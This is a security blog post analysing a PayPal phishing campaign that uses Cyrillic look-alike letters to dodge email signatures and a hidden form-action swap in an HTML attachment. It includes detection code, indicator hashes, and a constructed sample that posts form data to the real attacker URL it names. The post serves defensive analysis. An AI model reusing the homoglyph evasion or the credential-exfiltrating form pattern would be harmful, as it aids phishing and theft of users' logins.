Sunday, 1 October 2017

PayPal Phishing - Homographic Email Body

There's an ongoing PayPal phishing campaign in the wild which sends HTML attachments that spoof PayPal forms and ask users for sensitive information. This campaign is particularly interesting because the email body was encoded with Unicode characters which look similar to the corresponding ASCII characters.

Homographic attacks are usually performed to craft URLs which look like legitimate URLs by substituting some of the ASCII characters with their look-alike Unicode characters.

However, in this particular campaign, the entire email body has been crafted using this technique.

Why apply Homographic Technique to Email Body?

Several security analysts as well as security vendors write static signatures which are crafted to detect patterns in the email body. The homographic technique allows these static signatures to be easily bypassed, because a signature written against the ASCII phrase no longer matches once the attacker mixes ASCII and look-alike Unicode characters, and the mix can be varied from message to message to generate different patterns.

As an example, in the email shown in Figure 1 we can see that the email body looks like it's written in English. But if you pay close attention, you will observe that some of the English letters have been substituted with look-alike Cyrillic characters.


Figure 1
To get a better understanding of this, let's look at the email body with Unicode characters displayed with their equivalent encoding as shown in Figure 2.



Figure 2

The actual email body, with its non-ASCII characters shown as percent-encoded UTF-8 bytes, is:

%D0%85%D0%B5ptember 29th 2017

Hell%D0%BE!

It %D0%B0%D1%80pea%D0%B3%D1%95 t%D2%BBat some of y%D0%BEu%D0%B3 %D0%B3ec%D0%BE%D0%B3d%D1%95 %D2%BBav%D0%B5 g%D0%BEne miss%D1%96ng %D0%BEr be%D1%81%D0%B0me out%D4%81at%D0%B5d.

Now, if we look up the above encodings, we can see how the attacker has mixed ASCII with Cyrillic characters.

As an example, let's decode the string: "%D0%85%D0%B5ptember 29th 2017"

Cyrillic letters (code points U+0400 to U+052F) are encoded as two bytes in UTF-8, which is why each substituted letter shows up as a pair of percent-encoded bytes. (Unicode characters in general take one to four bytes in UTF-8; two is just what this block needs.)

%D0%85 - U+0405 - CYRILLIC CAPITAL LETTER DZE (looks like Latin S)
%D0%B5 - U+0435 - CYRILLIC SMALL LETTER IE (looks like Latin e)

You can look up the Unicode Values here: http://www.utf8-chartable.de/unicode-utf8-table.pl?start=1024

In this way, we can see how the attacker has spelled the word "September" with a mix of scripts: only the first two letters are Cyrillic, and "ptember" is plain ASCII, so the word still renders as "September" but no longer matches an ASCII signature for it.
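The decoding walked through above, and the signature-bypass argument from the earlier section, as an added example (not code from the original post). It percent-decodes the quoted body, names every non-ASCII code point, folds the look-alikes back to ASCII, and shows that a static signature for the English phrase misses the raw body but hits the folded one. The confusables table is hand-built for just the letters this sample uses and is an assumption of the example; Unicode's confusables.txt is the complete reference. The mixed-script check needs no table at all and is the more general detection: real English or Russian text almost never mixes Latin and Cyrillic letters inside one word.

```python
import re
import unicodedata
from urllib.parse import unquote

# The percent-encoded body quoted in the post, reconstructed here as one
# string (constructed sample input).
ENCODED_BODY = (
    "%D0%85%D0%B5ptember 29th 2017\n"
    "Hell%D0%BE!\n"
    "It %D0%B0%D1%80pea%D0%B3%D1%95 t%D2%BBat some of y%D0%BEu%D0%B3 "
    "%D0%B3ec%D0%BE%D0%B3d%D1%95 %D2%BBav%D0%B5 g%D0%BEne miss%D1%96ng "
    "%D0%BEr be%D1%81%D0%B0me out%D4%81at%D0%B5d.\n"
)

# Hand-built confusables table covering only the Cyrillic letters this sample
# uses (an assumption for the example; Unicode's confusables.txt is the full
# reference). The value is the Latin letter the attacker substituted it for.
CONFUSABLES = {
    "\u0405": "S",  # CYRILLIC CAPITAL LETTER DZE
    "\u0455": "s",  # CYRILLIC SMALL LETTER DZE
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0433": "r",  # CYRILLIC SMALL LETTER GHE (stands in for r here)
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u04bb": "h",  # CYRILLIC SMALL LETTER SHHA
    "\u0501": "d",  # CYRILLIC SMALL LETTER KOMI DE
}

# A static signature of the kind the post says the attacker is evading:
# it only matches when every letter of the phrase is ASCII.
SIGNATURE = re.compile(r"some of your records have gone missing", re.I)


def decode_body(encoded):
    """Percent-decode the body. unquote() assumes UTF-8, so each %Dx%xx pair
    becomes one Cyrillic code point."""
    return unquote(encoded)


def confusable_report(text):
    """One row per distinct non-ASCII character: the character, its code
    point, its Unicode name, and the Latin letter it imitates ('?' if the
    table does not know it)."""
    rows, seen = [], set()
    for ch in text:
        if ord(ch) > 0x7F and ch not in seen:
            seen.add(ch)
            rows.append((ch, f"U+{ord(ch):04X}",
                         unicodedata.name(ch, "UNKNOWN"),
                         CONFUSABLES.get(ch, "?")))
    return rows


def skeleton(text):
    """Fold known look-alikes back to ASCII so an ASCII signature can match."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in text)


def is_cyrillic(ch):
    return unicodedata.name(ch, "").startswith("CYRILLIC")


def mixed_script_words(text):
    """Words containing both Latin and Cyrillic letters."""
    words = []
    for word in re.findall(r"\w+", text):
        has_latin = any("a" <= c.lower() <= "z" for c in word)
        has_cyrillic = any(is_cyrillic(c) for c in word)
        if has_latin and has_cyrillic:
            words.append(word)
    return words


if __name__ == "__main__":
    body = decode_body(ENCODED_BODY)
    print(body)
    for ch, cp, name, latin in confusable_report(body):
        print(f"{ch} {cp} {name} -> {latin}")
    print("mixed-script words:", mixed_script_words(body))
    print("signature on raw body:      ", bool(SIGNATURE.search(body)))
    print("signature on ASCII skeleton:", bool(SIGNATURE.search(skeleton(body))))
```

Running it shows the raw body failing the signature while its skeleton reads "It appears that some of your records have gone missing or became outdated." and matches. For production use, run signatures against the skeleton (or a confusables-based normalization) rather than the raw body, and treat any mixed-script word in an English-language mail as an indicator in its own right.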

HTML Attachment Analysis

MD5 hash: bfe06c7da972a82477016193e5b3c3ac

The HTML attachment contains obfuscated JavaScript as shown in Figure 3. It uses the HTML DOM to construct the PayPal-styled HTML form dynamically at load time, so the form is not visible in the static source.


Figure 3

This is done by dynamically creating an HTML script tag with the src attribute set to: http://www.solutionivy.com/e1e99eb37b7fcecc7a18df3db5e65aac.js (shown in Figure 4).

Figure 4

After deobfuscating the above JavaScript, we can see the PayPal HTML form.

Another interesting technique is the dynamic replacement of the form's action on submission.

The HTML Form looks as shown below:

<form name="ytrKbjzK" onsubmit="https://www.paypal.com/">
 .....
<input type=button class=submitBtn onClick=uF8Nu() value="Submit Form">

So, when the Submit button is pressed, the function uF8Nu() is invoked.

This function replaces the paypal.com URL in the form's POST action with hxxp://www.solutionivy.com/e1e99eb3.php at submit time (shown in Figure 5). The static markup therefore still points at paypal.com, while the submitted data actually goes to the attacker's server.


Figure 5

The rendered HTML form is shown in Figure 6.


Figure 6
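A static triage check for the two indicators just described (a script injected via the DOM from a non-brand host, and a form.action reassignment at submit time), as an added example that is not code from the original post. It assumes the attachment's JavaScript has already been deobfuscated, as in Figure 5; SAMPLE_HTML is a constructed stand-in that reproduces the structure the post describes using the URLs the post names, and is not the attacker's file. The check is deliberately conservative: it reports what a reviewer sees in the <form> markup separately from what only takes effect once JavaScript runs.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

BRAND_DOMAIN = "paypal.com"

# Constructed stand-in for the deobfuscated attachment. It reproduces the
# structure the post describes (DOM-injected script, a form that names
# paypal.com, a submit handler that swaps the action) with the URLs the post
# names. It is NOT the attacker's code.
SAMPLE_HTML = """
<html><body>
<script>
var s = document.createElement("script");
s.src = "hxxp://www.solutionivy.com/e1e99eb37b7fcecc7a18df3db5e65aac.js";
document.head.appendChild(s);
</script>
<form name="ytrKbjzK" onsubmit="https://www.paypal.com/">
<input type="text" name="email">
<input type=button class=submitBtn onClick=uF8Nu() value="Submit Form">
</form>
<script>
function uF8Nu() {
  var f = document.forms["ytrKbjzK"];
  f.action = "hxxp://www.solutionivy.com/e1e99eb3.php";
  f.submit();
}
</script>
</body></html>
"""

# A benign form for comparison (constructed).
BENIGN_HTML = '<form action="https://www.paypal.com/cgi-bin/webscr"><input type=submit></form>'

# Defanged hxxp(s) URLs are accepted so analyst notes can be fed in directly.
URL_RE = re.compile(r"""(?:https?|hxxps?)://[^\s'"<>]+""", re.I)
ACTION_ASSIGN_RE = re.compile(r"""\.action\s*=\s*['"]([^'"]+)['"]""")
SRC_ASSIGN_RE = re.compile(r"""\.src\s*=\s*['"]([^'"]+)['"]""")


class AttachmentParser(HTMLParser):
    """Collects <script src>, <form> attributes and inline script text."""

    def __init__(self):
        super().__init__()
        self.script_src = []
        self.forms = []
        self.inline_js = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_src.append(a["src"])
        elif tag == "form":
            self.forms.append(a)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_js.append(data)


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def is_brand(host, brand=BRAND_DOMAIN):
    return host == brand or host.endswith("." + brand)


def triage(html, brand=BRAND_DOMAIN):
    p = AttachmentParser()
    p.feed(html)
    js = "\n".join(p.inline_js)
    # Hosts a reviewer sees in the static <form> markup (action / onsubmit).
    shown = [u for f in p.forms for key in ("action", "onsubmit")
             for u in URL_RE.findall(f.get(key) or "")]
    # Hosts that only matter once JavaScript runs: scripts pulled from the
    # network and any form.action reassignment in inline code.
    scripts = p.script_src + SRC_ASSIGN_RE.findall(js)
    rewritten = ACTION_ASSIGN_RE.findall(js)
    result = {
        "shown_submit_hosts": sorted({host_of(u) for u in shown}),
        "script_hosts": sorted({host_of(u) for u in scripts}),
        "runtime_action_hosts": sorted({host_of(u) for u in rewritten}),
    }
    offbrand = [h for h in result["script_hosts"] + result["runtime_action_hosts"]
                if not is_brand(h, brand)]
    result["suspicious"] = bool(offbrand)
    return result


if __name__ == "__main__":
    for label, doc in (("attachment", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(label, triage(doc))
```

The regexes only catch literal string assignments; an attachment that builds the URL from concatenated fragments or an obfuscated array (as the real one does before deobfuscation) needs the script executed in an instrumented browser or sandbox, with the outgoing request host compared against the brand the form imitates.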

Below are the MD5 hashes of some more HTML attachments from the wild which were sent in the same campaign; the corresponding email bodies were encoded using the technique described above.

ab7d6d006297e60311ff078f068a641d
213763dd92271558b5a0bb890b9fe12e
cc00a53518fe4bfb1bb91a9666669a60
f55fb03d626bb894a03339610b6360b0
08420289382d024f619dd33362e7af88
1cebd3b0aed36d88cb0b91b3199e41f8
763bb271183ca4d42c94199f1b9c210a
a504b0e6f5ceb01b525bfd66f2b368fa
21acb6cbb25101ec9f0ecc39dddd130e
befea3711344e43fd5b416b208d56995
a556dc89f48cab14f4ec678975eff822
04596ccd039fe04bfdbe1907fa1bf470
